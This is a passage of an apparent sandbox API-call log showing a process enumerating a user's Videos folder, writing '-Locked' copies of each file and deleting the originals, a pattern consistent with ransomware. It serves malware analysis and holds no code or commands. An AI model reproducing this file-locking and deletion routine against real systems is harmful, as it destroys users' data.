lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Templates", lpFilePart=0x0) returned 0x1f [0304.217] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Templates\\", lpFilePart=0x0) returned 0x20 [0304.218] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Templates\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af128) returned 1 [0304.225] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos", lpFilePart=0x0) returned 0x1c [0304.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.225] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos", lpFilePart=0x0) returned 0x1c [0304.225] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpFilePart=0x0) returned 0x1d [0304.226] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.226] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.227] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0xe9782b10, ftLastAccessTime.dwHighDateTime=0x1d7e3c8, ftLastWriteTime.dwLowDateTime=0xe9782b10, ftLastWriteTime.dwHighDateTime=0x1d7e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FfeATZnfpFdMi", cAlternateFileName="1FFEAT~1")) returned 1 [0304.227] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d09790, ftCreationTime.dwHighDateTime=0x1d7df17, ftLastAccessTime.dwLowDateTime=0xd63a5610, ftLastAccessTime.dwHighDateTime=0x1d7e35d, ftLastWriteTime.dwLowDateTime=0xd63a5610, ftLastWriteTime.dwHighDateTime=0x1d7e35d, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bsya RNak.avi", cAlternateFileName="BSYARN~1.AVI")) returned 1 [0304.227] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4347fe61, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ab37d0, ftCreationTime.dwHighDateTime=0x1d7e120, ftLastAccessTime.dwLowDateTime=0xa8984b40, ftLastAccessTime.dwHighDateTime=0x1d7e501, ftLastWriteTime.dwLowDateTime=0xa8984b40, ftLastWriteTime.dwHighDateTime=0x1d7e501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dHpS", cAlternateFileName="")) returned 1 [0304.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86432e80, ftCreationTime.dwHighDateTime=0x1d7dd9e, ftLastAccessTime.dwLowDateTime=0xb46f6d60, ftLastAccessTime.dwHighDateTime=0x1d7e0db, ftLastWriteTime.dwLowDateTime=0xb46f6d60, ftLastWriteTime.dwHighDateTime=0x1d7e0db, nFileSizeHigh=0x0, nFileSizeLow=0x7323, dwReserved0=0x0, dwReserved1=0x0, cFileName="r6h4I4TkF0BMMvPDE.swf", cAlternateFileName="R6H4I4~1.SWF")) returned 1 [0304.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d8f270, ftCreationTime.dwHighDateTime=0x1d7d73e, ftLastAccessTime.dwLowDateTime=0x13287730, ftLastAccessTime.dwHighDateTime=0x1d7d83e, ftLastWriteTime.dwLowDateTime=0x13287730, ftLastWriteTime.dwHighDateTime=0x1d7d83e, nFileSizeHigh=0x0, nFileSizeLow=0xde22, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLwjRP.avi", cAlternateFileName="")) returned 1 [0304.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.229] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0304.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0304.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0304.229] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos", lpFilePart=0x0) returned 0x1c [0304.229] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\", lpFilePart=0x0) returned 0x1d [0304.229] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.230] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.230] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0xe9782b10, ftLastAccessTime.dwHighDateTime=0x1d7e3c8, ftLastWriteTime.dwLowDateTime=0xe9782b10, ftLastWriteTime.dwHighDateTime=0x1d7e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FfeATZnfpFdMi", cAlternateFileName="1FFEAT~1")) returned 1 [0304.230] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d09790, ftCreationTime.dwHighDateTime=0x1d7df17, ftLastAccessTime.dwLowDateTime=0xd63a5610, ftLastAccessTime.dwHighDateTime=0x1d7e35d, ftLastWriteTime.dwLowDateTime=0xd63a5610, ftLastWriteTime.dwHighDateTime=0x1d7e35d, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="bsya RNak.avi", cAlternateFileName="BSYARN~1.AVI")) returned 1 [0304.230] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4347fe61, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.231] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5ab37d0, ftCreationTime.dwHighDateTime=0x1d7e120, ftLastAccessTime.dwLowDateTime=0xa8984b40, ftLastAccessTime.dwHighDateTime=0x1d7e501, ftLastWriteTime.dwLowDateTime=0xa8984b40, ftLastWriteTime.dwHighDateTime=0x1d7e501, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dHpS", cAlternateFileName="")) returned 1 [0304.231] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86432e80, ftCreationTime.dwHighDateTime=0x1d7dd9e, ftLastAccessTime.dwLowDateTime=0xb46f6d60, ftLastAccessTime.dwHighDateTime=0x1d7e0db, ftLastWriteTime.dwLowDateTime=0xb46f6d60, ftLastWriteTime.dwHighDateTime=0x1d7e0db, nFileSizeHigh=0x0, nFileSizeLow=0x7323, dwReserved0=0x0, dwReserved1=0x0, cFileName="r6h4I4TkF0BMMvPDE.swf", cAlternateFileName="R6H4I4~1.SWF")) returned 1 [0304.231] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d8f270, ftCreationTime.dwHighDateTime=0x1d7d73e, ftLastAccessTime.dwLowDateTime=0x13287730, ftLastAccessTime.dwHighDateTime=0x1d7d83e, ftLastWriteTime.dwLowDateTime=0x13287730, ftLastWriteTime.dwHighDateTime=0x1d7d83e, nFileSizeHigh=0x0, nFileSizeLow=0xde22, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLwjRP.avi", cAlternateFileName="")) returned 1 [0304.231] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d8f270, ftCreationTime.dwHighDateTime=0x1d7d73e, ftLastAccessTime.dwLowDateTime=0x13287730, ftLastAccessTime.dwHighDateTime=0x1d7d83e, ftLastWriteTime.dwLowDateTime=0x13287730, ftLastWriteTime.dwHighDateTime=0x1d7d83e, nFileSizeHigh=0x0, nFileSizeLow=0xde22, dwReserved0=0x0, dwReserved1=0x0, cFileName="RLwjRP.avi", cAlternateFileName="")) returned 0 [0304.232] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0304.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0304.232] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked", lpFilePart=0x0) returned 0x31 [0304.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.232] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\bsya rnak.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.233] GetFileType (hFile=0x49c) returned 0x1 [0304.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.233] GetFileType (hFile=0x49c) returned 0x1 [0304.277] CloseHandle (hObject=0x49c) returned 1 [0304.277] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi", lpFilePart=0x0) returned 0x2a [0304.278] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\bsya RNak.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\bsya rnak.avi")) returned 1 [0304.304] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2f [0304.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.304] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.305] GetFileType (hFile=0x49c) returned 0x1 [0304.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.305] GetFileType (hFile=0x49c) returned 0x1 [0304.307] CloseHandle (hObject=0x49c) returned 1 [0304.307] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x28 [0304.308] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini")) returned 1 [0304.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked", lpFilePart=0x0) returned 0x39 [0304.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.308] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\r6h4i4tkf0bmmvpde.swf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.309] GetFileType (hFile=0x49c) returned 0x1 [0304.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.309] GetFileType (hFile=0x49c) returned 0x1 [0304.311] CloseHandle (hObject=0x49c) returned 1 [0304.311] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf", lpFilePart=0x0) returned 0x32 [0304.311] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\r6h4i4tkf0bmmvpde.swf")) returned 1 [0304.312] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked", lpFilePart=0x0) returned 0x2e [0304.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.312] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\rlwjrp.avi-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.313] GetFileType (hFile=0x49c) returned 0x1 [0304.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.313] GetFileType (hFile=0x49c) returned 0x1 [0304.315] CloseHandle (hObject=0x49c) returned 1 [0304.315] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi", lpFilePart=0x0) returned 0x27 [0304.316] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\rlwjrp.avi")) returned 1 [0304.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0304.324] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", lpFilePart=0x0) returned 0x2b [0304.324] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", lpFilePart=0x0) returned 0x2c [0304.324] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0xe9782b10, ftLastAccessTime.dwHighDateTime=0x1d7e3c8, ftLastWriteTime.dwLowDateTime=0xe9782b10, ftLastWriteTime.dwHighDateTime=0x1d7e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.325] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0xe9782b10, ftLastAccessTime.dwHighDateTime=0x1d7e3c8, ftLastWriteTime.dwLowDateTime=0xe9782b10, ftLastWriteTime.dwHighDateTime=0x1d7e3c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.325] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9eca30, ftCreationTime.dwHighDateTime=0x1d7e438, ftLastAccessTime.dwLowDateTime=0x19bfaa30, ftLastAccessTime.dwHighDateTime=0x1d7e745, ftLastWriteTime.dwLowDateTime=0x19bfaa30, ftLastWriteTime.dwHighDateTime=0x1d7e745, nFileSizeHigh=0x0, nFileSizeLow=0x4826, dwReserved0=0x0, dwReserved1=0x0, cFileName="avX9IKgh.mp4", cAlternateFileName="")) returned 1 [0304.325] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3398ca80, ftCreationTime.dwHighDateTime=0x1d7de45, ftLastAccessTime.dwLowDateTime=0xbe841590, ftLastAccessTime.dwHighDateTime=0x1d7e4e5, ftLastWriteTime.dwLowDateTime=0xbe841590, ftLastWriteTime.dwHighDateTime=0x1d7e4e5, nFileSizeHigh=0x0, nFileSizeLow=0xea66, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPERAUjKKYfC9.mkv", cAlternateFileName="BPERAU~1.MKV")) returned 1 [0304.326] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b1128f0, ftCreationTime.dwHighDateTime=0x1d7e770, ftLastAccessTime.dwLowDateTime=0xf84f99d0, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0xf84f99d0, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0xe162, dwReserved0=0x0, dwReserved1=0x0, cFileName="C9b1z.avi", cAlternateFileName="")) returned 1 [0304.326] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93510d40, ftCreationTime.dwHighDateTime=0x1d7e53c, ftLastAccessTime.dwLowDateTime=0x7a431fa0, ftLastAccessTime.dwHighDateTime=0x1d7e6fe, ftLastWriteTime.dwLowDateTime=0x7a431fa0, ftLastWriteTime.dwHighDateTime=0x1d7e6fe, nFileSizeHigh=0x0, nFileSizeLow=0xa14b, dwReserved0=0x0, dwReserved1=0x0, cFileName="F sj97dzLd0j5xh.mp4", cAlternateFileName="FSJ97D~1.MP4")) returned 1 [0304.326] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x344c8210, ftCreationTime.dwHighDateTime=0x1d7dcf0, ftLastAccessTime.dwLowDateTime=0xf10169e0, ftLastAccessTime.dwHighDateTime=0x1d7e2a2, ftLastWriteTime.dwLowDateTime=0xf10169e0, ftLastWriteTime.dwHighDateTime=0x1d7e2a2, nFileSizeHigh=0x0, nFileSizeLow=0x7b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="qnm0fu5.swf", cAlternateFileName="")) returned 1 [0304.326] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f6ce6d0, ftCreationTime.dwHighDateTime=0x1d7e5db, ftLastAccessTime.dwLowDateTime=0x79fbdad0, ftLastAccessTime.dwHighDateTime=0x1d7e769, ftLastWriteTime.dwLowDateTime=0x79fbdad0, ftLastWriteTime.dwHighDateTime=0x1d7e769, nFileSizeHigh=0x0, nFileSizeLow=0x1595b, dwReserved0=0x0, dwReserved1=0x0, cFileName="syhAMp2P7oE.flv", cAlternateFileName="SYHAMP~1.FLV")) returned 1 [0304.327] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a52890, ftCreationTime.dwHighDateTime=0x1d7df3e, ftLastAccessTime.dwLowDateTime=0x2f75bf80, ftLastAccessTime.dwHighDateTime=0x1d7e71e, ftLastWriteTime.dwLowDateTime=0x2f75bf80, ftLastWriteTime.dwHighDateTime=0x1d7e71e, nFileSizeHigh=0x0, nFileSizeLow=0xf864, dwReserved0=0x0, dwReserved1=0x0, cFileName="y2cTfXCEKtMuyCJVAqX.mkv", cAlternateFileName="Y2CTFX~1.MKV")) returned 1 [0304.327] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.327] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.327] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0304.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0304.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0304.328] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", lpFilePart=0x0) returned 0x2b [0304.328] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", lpFilePart=0x0) returned 0x2c [0304.328] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\*", lpFindFileData=0x1aee44 | out: 